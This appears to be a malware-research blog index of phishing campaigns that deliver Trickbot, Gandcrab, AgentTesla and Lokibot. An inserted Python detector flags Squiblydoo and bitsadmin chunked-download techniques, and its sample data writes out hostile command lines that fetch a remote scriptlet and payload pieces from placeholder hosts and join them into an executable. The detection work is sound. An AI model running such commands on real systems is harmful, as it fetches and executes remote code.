Fake DHL email delivers an unknown keylogger coupled with a phishing scam

I was extremely surprised to wake up this Sunday morning to a whole slew of fake DHL delivery notice emails with a macro-enabled Word doc attachment that eventually downloads some sort of keylogger. There is some dispute as to what the actual Keylogge…

Fake order eventually drops Lokibot but something else happens

I am not entirely sure what the initial binary download with this one is, but there are indications it might be Dark Comet RAT. What we do know is that it drops a Lokibot binary. The Word doc is actually an RTF file containing embedded OLE objects. Th…

More AgentTesla keylogger info-stealer campaigns hitting UK

We are still seeing continuous AgentTesla keylogger / info-stealer campaigns hitting the UK. We still aren't seeing a lot of other malware at the moment. I have received about 20 different versions over the last week that have all been nothing spe…

Fake order delivering AveMaria stealer with difficult office doc.

I had a bit of a problem trying to analyse this malware today. The Word doc looks pretty average at first glance, but trying to run it in Anyrun on a W7 32- or 64-bit version of Windows gave me VBA errors. It also wouldn't run on a 64-bit version…

Trickbot via fake Efax message using Squiblydoo, Active X, macro and abusing pastebin

We are seeing massive changes with the Trickbot delivery campaign overnight. I have only seen 1 mention on Twitter about this campaign and 1 on a private malware research mailing list, so it can't be affecting too many recipients. This example i…

Fake DHL Urgent Delivery notice delivers Gandcrab 5.2 ransomware

Yet another Gandcrab ransomware campaign. This time spoofing DHL Express with a fake delivery notification email. This delivers Gandcrab 5.2 ransomware, which currently does not have free decryption available. This bad actor is getting a bit lazy an…

Fake CDC Flu Pandemic Warning delivers Gandcrab 5.2 ransomware

A somewhat interesting and slightly alarming malware campaign, spreading worldwide but supposedly targeting the USA, that pretends to be an urgent message from the CDC (Centre for Disease Control) warning about a flu outbreak. This delivers Gandc…

Fake Paychex Tax verification documents delivers Trickbot

They are still using this new version of the Trickbot delivery system, where Bitsadmin is used to download the payload in small sections to a victim's computer, where it is all joined together to make 1 file. This example is today's latest spoof or imita…
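Two of the delivery tricks summarised in these posts (the Squiblydoo regsvr32/scrobj.dll scriptlet load in the fake Efax Trickbot post, and the Bitsadmin chunked download plus file reassembly in the Paychex and Dun & Bradstreet Trickbot posts) leave characteristic process command lines. The following is an added example, not code from this blog or from any of the malware it describes: a small Python detector that scans a list of process-creation command lines for those patterns and then checks whether several bitsadmin downloads are followed by a `copy /b` join. The sample command lines, hostnames, paths and job names are all constructed for illustration; they are not indicators from the campaigns above.

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Finding:
    line_no: int      # 1-based index into the scanned command lines
    technique: str    # which rule fired
    command: str      # the offending command line


# Constructed sample process-creation command lines (NOT real campaign IOCs).
# The hostnames, paths and job names are illustrative placeholders.
SAMPLE_CMDLINES = [
    r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\bob\Downloads\efax_12345.doc"',
    r'regsvr32.exe /s /n /u /i:https://pastebin.example/raw/abc123 scrobj.dll',
    r'bitsadmin /transfer job1 /download /priority high http://files.example/p1.bin C:\Users\bob\AppData\Local\Temp\p1.bin',
    r'bitsadmin /transfer job2 /download /priority high http://files.example/p2.bin C:\Users\bob\AppData\Local\Temp\p2.bin',
    r'cmd.exe /c copy /b C:\Users\bob\AppData\Local\Temp\p1.bin + C:\Users\bob\AppData\Local\Temp\p2.bin C:\Users\bob\AppData\Local\Temp\payload.exe',
    r'bitsadmin /list',
    r'notepad.exe C:\Users\bob\notes.txt',
]

# Detection rules: (technique name, regex matched case-insensitively against
# the full command line). The first rule that matches a line wins.
RULES = [
    # Squiblydoo: regsvr32 told (/i:) to fetch a scriptlet and run it via scrobj.dll.
    ("squiblydoo",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*\s/i:\S+.*\bscrobj\.dll", re.I)),
    # bitsadmin /transfer pulling a file from a URL (one chunk of a split payload).
    ("bitsadmin_download",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b.*\bhttps?://", re.I)),
    # copy /b a+b c: binary concatenation used to reassemble the chunks.
    ("binary_concat",
     re.compile(r"\bcopy\s+/b\s+\S+\s*\+\s*\S+", re.I)),
]


def scan(cmdlines: List[str]) -> List[Finding]:
    """Return one Finding for every command line that matches a rule."""
    findings = []
    for n, cmd in enumerate(cmdlines, start=1):
        for technique, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(n, technique, cmd))
                break
    return findings


def chunked_download_chain(findings: List[Finding], min_chunks: int = 2) -> bool:
    """True when at least min_chunks bitsadmin downloads are later followed by a copy /b join.

    A single bitsadmin transfer is common admin activity; several transfers
    followed by a binary concatenation is the split-payload reassembly pattern.
    """
    chunks = [f.line_no for f in findings if f.technique == "bitsadmin_download"]
    joins = [f.line_no for f in findings if f.technique == "binary_concat"]
    return len(chunks) >= min_chunks and any(j > max(chunks) for j in joins)


if __name__ == "__main__":
    hits = scan(SAMPLE_CMDLINES)
    for f in hits:
        print(f"line {f.line_no}: {f.technique}: {f.command}")
    print("chunked download + reassembly chain:", chunked_download_chain(hits))
```

In practice the command lines would come from Sysmon event ID 1 or Windows Security event 4688 rather than a hard-coded list; the regexes deliberately key on the argument shape (`/i:` plus `scrobj.dll`, `/transfer` plus a URL, `copy /b` with a `+`) rather than on any hostname, so they are not tied to the constructed sample data.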

Fake Dun & Bradstreet Company Complaint delivers Trickbot

Continuing with the recent changes to the Trickbot delivery system and possibly the payloads and configs today. This example is today's latest spoof or imitation of a well-known company, bank or public authority delivering the Trickbot banking Trojan. The …